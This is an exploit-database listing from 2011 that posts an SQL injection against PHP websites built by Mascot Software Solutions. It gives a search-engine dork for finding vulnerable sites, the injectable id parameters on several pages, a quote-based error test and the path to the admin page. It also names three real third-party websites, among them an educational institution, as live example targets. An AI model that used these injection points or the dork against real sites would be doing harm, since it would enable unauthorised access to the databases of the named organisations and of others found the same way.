[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Mascot Software Solutions SQL injection Vulnerability

Author
k's0uR!
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16325
Category
web applications
Date add
13-06-2011
Platform
php
‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡

[+] Exploit Title : Mascot Software Solutions.. SQL injection Vulnerability
[+] Author : k's0uR!
[+] Category : WebApps
[+] d0rk : "Design & Maintained By : Mascot Software Solutions"[Or]"Creation By : Mascot Software Solutions"
[+] Faceb00k : http://www.facebook.com/dali.Developpeur
[+] Tested on : Windows Xp SP2

‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡

[+]   Exploit:


››http://localhost/deatilsnews.php?id={VaLid id }
››http://localhost/viewgallery.php?id={VaLid id }
››http://localhost/noticeDetails.php?id={VaLid id }

››Check all .php?*= mostly all vul.. to sql-i.!
›› use your head..!!

››http://localhost/deatilsnews.php?id=' » {sql Error}  (^_^)
››http://localhost/deatilsnews.php?id= SQL here 
...
›› admin page:
›› http://localhost/admin/  (*_*)


‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡

[+]   Example:

››http://www.kvsiwan.org/deatilsnews.php?id=36'
››http://www.dalimss.com/viewgallery.php?id=52'
››http://siitgkp.edu.in/viewgallery.php?id=2'

‡‡###########‡‡#######‡‡#########‡‡######‡‡#########‡‡##############‡‡

[+]Greetz To : 4ll 1nj3ctor team... 4ll My friendS ...tunis1an h4ck3rs...++...
[+] Made in tunisia
[+]to be continued..



#  0day.today [2024-11-16]  #